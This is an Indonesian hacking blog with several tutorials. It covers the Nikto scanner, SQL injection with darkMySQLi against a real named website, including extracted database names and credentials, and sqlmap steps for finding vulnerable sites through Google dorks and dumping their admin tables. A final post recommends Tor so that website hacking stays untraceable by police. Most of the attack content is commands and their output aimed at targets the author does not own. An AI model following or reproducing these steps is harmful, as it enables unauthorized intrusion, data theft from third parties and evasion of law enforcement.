Tampilkan postingan dengan label Injection. Tampilkan semua postingan
Tampilkan postingan dengan label Injection. Tampilkan semua postingan

Rabu, 18 April 2012

Penetrasi dengan Nikto

Refrensi : pemula
Tested : linux backtrack 4 R2
versi :v2.1.3

Sekilas mengenai nikto

Nikto merupakan web scanner Open Source (GPL), yang melakukan tes komprehensif terhadap web server. Nikto memiliki kemampuan mendeteksi 3500 file yang berpotensi mendatangkan bahaya / CGIS. Nikto dapat menguji web server dengan cepat, tetapi mudah dilihat pada log. Tapi sangat berguna untuk menguji suatu web server.

Menu Utilities :

-config+ Use this config file
-Cgidirs+ scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
-dbcheck check database and other key files for syntax errors (cannot be abbreviated)
-evasion+ ids evasion technique
-Format+ save file (-o) format
-host+ target host
-Help Extended help information
-id+ host authentication to use, format is userid:password
-list-plugins List all available plugins
-mutate+ Guess additional file names
-mutate-options+ Provide extra information for mutations
-output+ Write output to this file
-nocache Disables the URI cache
-nossl Disables using SSL
-no404 Disables 404 checks
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-root+ Prepend root value to all requests, format is /directory
-Display+ Turn on/off display outputs
-ssl Force ssl mode on port
-Single Single request mode
-timeout+ Timeout (default 2 seconds)
-Tuning+ Scan tuning
-update Update databases and plugins from cirt.net (cannot be abbreviated)
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
+ requires a value

File konfigurasi terletak di direktori (/ pentest / scanner / Nikto) dan disebut config.txt

################################################################################​#########################
# CONFIG STUFF
################################################################################​#########################
# default command line options, can't be an option that requires a value. used for ALL runs.
# CLIOPTS=-g -a

# location of nmap to use with port scanning (rather than Nikto internals)
# and any options to pass to it
NMAP=/usr/local/bin/nmap
NMAPOPTS=-P0

# ports never to scan
SKIPPORTS=21 111

# IDs never to alert on (Note: this only works for IDs loaded from db_tests)
SKIPIDS=000703

# if Nikto is having difficulty finding the ‘plugins’, set the full install path here
# EXECDIR=/usr/local/nikto

# the default HTTP version to try… can/will be changed as necessary
DEFAULTHTTPVER=1.0

# Nikto can submit updated version strings to CIRT.net. It won’t do this w/o permission. You should
# send updates because it makes the data better for everyone ;) *NO* server specific information
# such as IP or name is sent, just the relevant version information.
# UPDATES=yes #– ask before each submission if it should send
# UPDATES=no #– don’t ask, don’t send
# UPDATES=auto #– automatically attempt submission *without prompting*
UPDATES=yes

# Warning if MAX_WARN OK or MOVED responses are retrieved
MAX_WARN=20

# Prompt… if set to ‘no’ you’ll never be asked for anything. Good for automation.
#PROMPTS=no

# cirt.net : set the IP so that updates can work without name resolution
CIRT=209.172.49.178

################################################################################​#########################
# PROXY STUFF
################################################################################​#########################
#PROXYHOST=127.0.0.1
#PROXYPORT=8080
#PROXYUSER=proxyuserid
#PROXYPASS=proxypassword

################################################################################​#########################
# COOKIE STUFF
################################################################################​#########################
# send a cookie with all requests, helpful if auth cookie is needed
#STATIC-COOKIE=cookiename=cookievalue

ini ane test di local lan ane yang udah ada virtual server a …
Beberapa penggunaan dasar :


Code:
zee-laptop@IBTeam:~$ perl nikto.pl -h 192.168.1.3

Untuk menguji port tertentu, gunakan opsi-p (port). Ini akan scan port IP 192.168.1.3 pada TCP 443

perl nikto.pl -h 192.168.1.3 -p 80

Berikut perintah untuk penggunaan pengujian multiport

perl nikto.pl -h 192.168.1.3 -p 80,88,443

Untuk Penggunaan menyimpan log txt

bt nikto # ./nikto.pl -e 1 -host hxxp://192.168.1.3/joomla1af -F txt -o monfile.txt

COntoh hasil

http://a4.sphotos.ak.fbcdn.net/hphotos-ak-snc6/180930_1568118200021_1147422359_31227298_7799398_n.jpg
Diposting oleh di Tidak ada komentar:
Label: , ,

darkMySQLI

tools ini mungkin memang sudah basi .. tapi berhubung ada di backtrack 5 so .. ane rasa mesti ane posting di mari ...hmmm.. jadi bagi teman2 yang sudah tau tentang tools ini harap diam dan biarkan yang lain yang belum tau bisa belajar Tongue

ok deh langsung saja

di backtrack 5 R1 tools ini berada pada directory
Code:
/pentest/web/darkmysqli

ok anggap udah di dalam ya ...

Code:
root@zee-eichel{/pentest/web/darkmysqli}:ls
./  ../  darkMySQLi.log  DarkMySQLi.py 
root@zee-eichel{/pentest/web/darkmysqli}:

ane kebetulan dapet situs yang vurln bakal ane jadiin contoh di mari Tongue

Code:
ttp://www.asf.ca/news.php?id=720'

udah ane kirim email ke adminya biar di patch kok Tongue cuma buat sample doang...

ok sekarang kita lihat opsi help pada tools ini

Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py --help

darkMySQLi v1.6 rsauron@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information

Target:
-u URL, --url=URL Target url

Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file


Untuk tahap awal kita harus mencari colom dari database situs target

syntax
Quote:python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol

Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720 --findcol

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...darkc0de--

[-] 18:07:20
[-] Total URL Requests: 2
[-] Done

Don't forget to check darkMySQLi.log

klo situs tadi vurln maka Langkah berikutnya seperti akhir pesan pada toos tersebut "Don't forget to check darkMySQLI.log" maka kita periksa log tersebut yang berada dalam satu directory dengan tools tersebut
Spoiler! :

root@zee-eichel{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--

[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done


nah perhatikan yang udah ane kasi warna merah ,, untuk langkah ketiga masukan sintax

Tujuan kita sebenarnya adalah menampilkan semua kolom yang ada pada database situs korban

Quote:python DarkMySQLi.py -u [url dari log dark log]-- --full

Spoiler! :

root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720+AND+1=...darkc0de-- --full

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.asf.ca/news.php?id=720+AND+1=...IMIT+0,1--



[-] 18:54:41
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkMySQLi.log

Lankah selanjutnya adalah liat lagi di log tadi

Spoiler! :

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790


[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done


Perhatikan lagi yang ane warnai merah Tongue
kita sudah mendapatkan nama database, user dan versi ,, masih 5 w0w w0w .. masih ada juga yang make versi 5 ckckckkc

Langkah selanjutnya tinggal dump databasenya kwkwkwkw
bisa pake manual kan udah ada tuh ..

syntax
Code:
darkMySQLi.py -u "(target yg ada bug)" --dump -D (nama databasenya) -T (nama table) -C (column,column)

udah dulu deh moga berguna ..Tongue
Diposting oleh di Tidak ada komentar:
Label: , , , ,

Selasa, 17 April 2012

SQLi Sqlmap.py

ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack...

ok langsung aja dari pada lama2..

yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh...

hihihiihih Tongue

ok serius nie..

1.buka SQL Map kalian dengan cara 
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...

3.setelah dapet web yang ada celah silakan pentest..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
-u = url
--dbs = kita mencari nama databasenya...

4.setalah ketemua nama databasenya..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..

5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:
python sqlmap.py http://site.com -D gatotganteng -T Admin --columns

Code:
pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump

kalo udah begini silakan dah..

mau kalian apain tapi yang jelas w kgk tanggung jawab ya..


wkwkwkkwkwkkwk

:ngakak:

udah jangan lupa

:kasihcendol:

wkwkkwkwk

salam veronochi

dan w hanya mau berbagi kepada orang-orang yang mau belajar...
Diposting oleh di Tidak ada komentar:
Label: , ,

Selasa, 10 April 2012

Hacking anonim(takterdeteksi) dengan Tor

Banyak dari tmn" pasti sering takut klw" pas lagi ngeHack website trus kedetek ipnya n ditangkap deh ma polisi...
nah kali ni ku punya sedikit solusi...pas lagi buka" youtube eh ketemu video tutorial bagus
Semoga dapat ide tentang bagaimana menggunakan Tor dengan lebih baik.. Ini sangat mudah digunakan ^_^. Seperti yang Anda lihat saya tidak pernah terhubung langsung ke website sasaran ...goodluck ^_^

Diposting oleh di Tidak ada komentar:
Label: , , ,
Langganan: Postingan (Atom)